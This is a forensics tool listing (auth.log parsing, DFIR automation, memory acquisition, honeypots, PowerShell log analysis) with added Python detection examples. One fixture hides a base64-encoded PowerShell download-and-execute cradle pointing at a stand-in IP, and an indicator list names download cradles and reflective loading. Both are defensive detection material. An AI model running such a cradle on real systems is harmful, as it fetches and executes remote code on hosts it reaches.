Category: Forensics

analyzing Linux authentication logs

AuthLogParser: analyzing Linux authentication logs

AuthLogParser is a Digital Forensics and Incident Response tool built for analyzing Linux authentication logs, commonly known as auth.log. It is aimed at incident responders, streamlining the...
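As an added example of the kind of triage such a tool performs (this is not AuthLogParser's own code and its function names, threshold and log lines are assumptions made here), the following script parses OpenSSH events out of a syslog-style auth.log, counts failures per source address, and flags the classic pattern of many failed attempts followed by an accepted login from the same address. The log lines are constructed for illustration.

```python
"""Added example: a small auth.log triage pass (not AuthLogParser's code).

Parses OpenSSH 'Accepted'/'Failed' lines from a Linux auth.log, counts failed
logins per source IP, and flags a successful login that follows a burst of
failures from the same IP (a likely brute-force success).
"""
import re
from collections import defaultdict

# Constructed sample auth.log excerpt (syslog format; only sshd lines are parsed).
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:12 web01 sshd[2210]: Failed password for invalid user admin from 203.0.113.7 port 50122 ssh2
Mar  3 10:01:15 web01 sshd[2210]: Failed password for invalid user admin from 203.0.113.7 port 50122 ssh2
Mar  3 10:01:19 web01 sshd[2214]: Failed password for root from 203.0.113.7 port 50130 ssh2
Mar  3 10:01:23 web01 sshd[2218]: Failed password for root from 203.0.113.7 port 50131 ssh2
Mar  3 10:01:40 web01 sshd[2222]: Accepted password for root from 203.0.113.7 port 50140 ssh2
Mar  3 10:02:02 web01 sshd[2230]: Accepted publickey for deploy from 198.51.100.20 port 41022 ssh2: ED25519 SHA256:abc
Mar  3 10:05:11 web01 sshd[2240]: Failed password for backup from 192.0.2.9 port 33010 ssh2
Mar  3 10:05:30 web01 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/bin/systemctl restart nginx
"""

# Matches the OpenSSH authentication result lines; "invalid user" marks an
# unknown account name, which is itself a useful signal.
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port (?P<port>\d+)"
)


def parse_sshd_events(text):
    """Return one dict per sshd Accepted/Failed line; all other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if m:
            event = m.groupdict()
            event["invalid_user"] = "invalid user" in line
            events.append(event)
    return events


def triage(events, threshold=3):
    """Aggregate per source IP and flag IPs with >= threshold failures before a success.

    Events must be in log order (as read from the file) so that 'accepted after
    failures' reflects the actual sequence.
    """
    stats = defaultdict(lambda: {"failed": 0, "accepted": [], "users": set()})
    suspicious = []
    for e in events:
        s = stats[e["ip"]]
        s["users"].add(e["user"])
        if e["result"] == "Failed":
            s["failed"] += 1
        else:
            s["accepted"].append(e["user"])
            if s["failed"] >= threshold and e["ip"] not in suspicious:
                suspicious.append(e["ip"])
    return stats, suspicious


if __name__ == "__main__":
    stats, suspicious = triage(parse_sshd_events(SAMPLE_AUTH_LOG))
    for ip, s in stats.items():
        print(f"{ip}: failed={s['failed']} accepted={s['accepted']} users={sorted(s['users'])}")
    print("likely brute-force success from:", suspicious)
```

On a real host, read `/var/log/auth.log` (Debian/Ubuntu) or `/var/log/secure` (RHEL family) and remember that syslog timestamps carry no year, so rotated files need the year supplied from file metadata before events can be ordered across files.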

DFIR automation tool

ForensicMiner: PowerShell-based DFIR automation tool

ForensicMiner is a PowerShell-based DFIR automation tool for digital investigations. Designed for efficiency, it automates artifact and evidence collection from Windows machines and is compatible with CrowdStrike Falcon RTR and Palo Alto Cortex...

network fingerprinting

JA4+: A suite of network fingerprinting standards

JA4+ is a suite of network fingerprinting methods that are easy to use and easy to share. The fingerprints are both human- and machine-readable, to support more effective threat hunting and analysis....

linux memory acquisition

Linpmem: A Linux memory acquisition tool

Linpmem is a physical memory acquisition tool for Linux (x64 only). Like its Windows counterpart, Winpmem, it is not a traditional memory dumper: Linpmem offers an API...

VoIP honeypot

WhisperPot: create a comprehensive VoIP honeypot system

WhisperPot is an ongoing project to build a comprehensive VoIP honeypot system. It logs attack attempts and helps identify potential threats and vulnerabilities in VoIP systems. WhisperPot simulates a realistic...

CVE-2023-22952

Cisco IOS XE implant scanning & detection

This repository contains information on post-exploitation activity linked to the mass exploitation of the Cisco IOS XE Software Web Management User Interface. Cisco Talos published a fingerprint that could check if...

PowerShell Log Analyzer

z9: PowerShell Log Analyzer

z9 detects artifacts of PowerShell-based malware in the PowerShell logging event log. The strength of PowerShell scripts lies in their ability to run without touching the file...
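To show what "artifacts in the PowerShell logging event log" means in practice, here is an added example that is not z9's code: it scans script block text as recorded by event ID 4104 (Microsoft-Windows-PowerShell/Operational), unwraps any `-EncodedCommand` argument (base64 of UTF-16LE), and matches a short indicator list for download cradles, hidden windows, and in-memory loading. The records, the indicator list and the function names are constructed here for illustration and are not z9's detection logic.

```python
"""Added example (not z9's code): scan PowerShell script block log text
(event ID 4104) for fileless-malware indicators, including payloads hidden
behind -EncodedCommand. Records and indicators are constructed for illustration.
"""
import base64
import re


def encode_command(script):
    """Build a -EncodedCommand argument the way PowerShell expects it: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed 4104 records as (record id, ScriptBlockText), e.g. after export
# with Get-WinEvent or an .evtx parser. Record 2 carries an encoded download cradle.
SAMPLE_4104 = [
    (1, "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"),
    (2, "powershell.exe -nop -w hidden -enc "
        + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")),
    (3, "$b = [System.Convert]::FromBase64String($x); [System.Reflection.Assembly]::Load($b)"),
    (4, "Import-Module ActiveDirectory; Get-ADUser -Filter * | Select-Object Name"),
]

# Starting-point indicators; a real rule set would be much larger and tuned per environment.
INDICATORS = {
    "invoke-expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "download-cradle": re.compile(r"\.(?:DownloadString|DownloadFile|DownloadData)\(|Invoke-WebRequest", re.I),
    "base64-decode": re.compile(r"FromBase64String", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no-profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "encoded-command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "reflective-load": re.compile(
        r"Reflection\.Assembly\]::Load|VirtualAlloc|Marshal\]::GetDelegateForFunctionPointer", re.I),
}

ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_commands(text):
    """Return the decoded script for every -EncodedCommand argument found in text."""
    decoded = []
    for m in ENC_RE.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a real encoded command; leave the raw text to the indicator scan
    return decoded


def analyze_record(record_id, script_text):
    """Scan the script block and any decoded layer; return a finding dict or None."""
    layers = [script_text] + decode_encoded_commands(script_text)
    hits = set()
    for layer in layers:
        for name, rx in INDICATORS.items():
            if rx.search(layer):
                hits.add(name)
    if not hits:
        return None
    return {"record": record_id, "indicators": sorted(hits), "decoded": layers[1:]}


def analyze(records):
    """Run analyze_record over (id, text) pairs and keep only records with findings."""
    return [f for f in (analyze_record(rid, text) for rid, text in records) if f]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_4104):
        print(finding["record"], finding["indicators"])
        for payload in finding["decoded"]:
            print("   decoded:", payload)
```

Script block logging must be enabled (Turn on PowerShell Script Block Logging policy) for 4104 events to exist at all; without it, a fileless payload that never touches disk may leave no artifact to scan.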